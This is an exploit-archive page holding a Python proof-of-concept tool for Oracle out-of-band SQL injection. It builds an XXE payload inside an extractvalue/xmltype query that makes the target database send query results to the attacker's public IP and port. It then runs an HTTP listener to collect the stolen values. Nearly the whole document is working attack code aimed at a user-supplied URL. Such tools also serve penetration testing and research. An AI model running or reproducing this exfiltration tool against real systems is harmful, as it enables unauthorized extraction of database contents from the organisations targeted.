4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / oracle-xxe-sqli.py PY
#!/usr/bin/python3
"""
Use: 
./oracle-xxe-sqli.py [options] <url>
"""
from ipaddress import ip_address
from requests import get
from random import randint
from urllib.parse import urlparse
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import quote_plus
from os.path import exists
import argparse
import socket
import threading
import json


__author__= "Daniel Cuesta Suárez - S2Grupo. @danielcues"

ENDCOLOR = '\033[0m'
TEST_NAME_MARKER = "$NAME_HERE$"
TEST_INJECTION_MARKER = "$INJECT_HERE$"
URL_INJECTION_MARKER = "*"
IP_MARKER = "$IP$"
PORT_MARKER = "$PORT$"

server_thread = executor = None
url = urlSplitted = ip = custom_headers = ""
port = 0
server_disabled=False
payload_file = "payloads.lst"



extractvalue= "select+extractvalue(xmltype('<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f><!DOCTYPE+root+[+<!ENTITY+%25+exfiltrate+SYSTEM+\"http%3a//" +IP_MARKER+":"+PORT_MARKER+"/query%3ftest%3d"+TEST_NAME_MARKER+"%26result%3d'||(" +TEST_INJECTION_MARKER+ ")||'\">+%25exfiltrate%3b+%25param]>'),NULL)+from+dual"

class levels:
    INFO 	= '\033[94m'
    WARNING 	= '\033[93m'
    OK 		= '\033[92m'
    ERROR 	= '\033[91m'

def log(string, level):
	print ('['+level+'+'+ENDCOLOR+'] '+string)
	return

def getPublicIP():
	try:
		ip = get('https://api.ipify.org').text
	except:	
		ip = None
		
	return  ip

def getRandomPort():
	port = randint(10000, 20000)
	return  port

class Executor:
	def __init__(self):
		return
	def sendPayload(self,payload):
		injector = extractvalue.replace(IP_MARKER,str(ip)).replace(PORT_MARKER,str(port))
		(key, value) = payload.split("\t")
		payload_ready=injector.replace(TEST_INJECTION_MARKER,quote_plus(value)).replace(TEST_NAME_MARKER,quote_plus(key))
		url_ready=url.replace(URL_INJECTION_MARKER, payload_ready)
		log("Sending payload: %s (%s)" % (key, value), levels.INFO)
		try:
			get(url_ready,headers=custom_headers).text
		except:
			log("Can't connect to host",levels.ERROR)
	def doExecute(self):
		try:
			with open(payload_file) as f:
				for payload in [item.strip() for item in f]:
					self.sendPayload(payload)
		except IOError:
			log("Cannot read file %s" % payload_file ,levels.error)
			exit()
	
					

class CustomHandler(BaseHTTPRequestHandler):
	def _set_headers(self):
		self.send_response(200)
		self.end_headers()
	def do_GET(self):
		self._set_headers()
		url_arguments = urlparse(self.path).query
		try:
			arguments = dict(arg.split("=") for arg in url_arguments.split('&'))
			test = arguments["test"]
			result = arguments["result"]
			if(test is not None and result is not None):
				log("%s: %s" % (test,result),levels.OK)
		except:
			#Random request bugging the server out
			pass
	
def startServer():
	global server_thread
	server = ('', port)
	httpd = HTTPServer(server, CustomHandler)
	log('Starting httpd...',levels.INFO)
	server_thread = threading.Thread(target = httpd.serve_forever)
	server_thread.start()
	return

def startTesting():
	executor.doExecute()	
	return




def initProgram():
	"""Parses the program arguments and stores them accordingly"""
	global url, urlSplitted, ip, port, server_disabled, custom_headers,payload_file

	parser = argparse.ArgumentParser(description='Options',
					 formatter_class=argparse.ArgumentDefaultsHelpFormatter)

	parser.add_argument("url", 
			    help="URL to test injection. Use %s as the injection marker, just once." % URL_INJECTION_MARKER)
	parser.add_argument("-i","--ip", 
			    help="Public ip. Useful for port forwardings. Default is this machine ip.",
			    type=ip_address,
			    default=getPublicIP())
	parser.add_argument("-p","--port", 
			    help="Port to use. Default will be chosen at random between 10000 and 20000.",
			    type=int,
			    default=getRandomPort())
	parser.add_argument("--disable-server", 
			    help="Don't start server",
			    action='store_true')
	parser.add_argument("--custom-headers", 
			    help="Pass a json dictionary with the custom headers.",
			    type=json.loads)
	parser.add_argument("-f","--payload-file", 
			    help="File to extract the SQL queries from",
			    default=payload_file)

	args= parser.parse_args()

	port = args.port
	ip = args.ip
	if (ip is None):
		log("Can't get a public IP, check your connection or proxy settings", levels.ERROR)
		exit()
	log('Using %s as public IP address and %d as port number' % (ip,port), levels.INFO)

	server_disabled = args.disable_server
	if(server_disabled):
		log("Server is disabled",levels.WARNING)

	url = args.url
	if (url.count('*') is not 1):
		log("URL must contain one and only one *", levels.ERROR)
		exit()
	log('URL to test: %s' % url, levels.INFO)

	custom_headers = args.custom_headers
	if(custom_headers is not None):
		log('Custom Headers: %s' % custom_headers, levels.INFO)
	
	payload_file=args.payload_file
	if exists(payload_file):
		log('Using file %s as payload source' % payload_file,levels.INFO)
	else:	
		log('File %s does not exist. Set a different one or create it' % payload_file,levels.ERROR)
		exit()
	urlSplitted = url.split(URL_INJECTION_MARKER)
	log('Upcomming tests will be injected: %s-->HERE<--%s' % (urlSplitted[0]+levels.OK, ENDCOLOR + urlSplitted[1]),levels.INFO)
	



def main():
	initProgram()
	global executor
	executor = Executor()
	if(not server_disabled):
		startServer()
	startTesting()
	if(not server_disabled):
		server_thread.join()
	return


if __name__ == '__main__':
	main()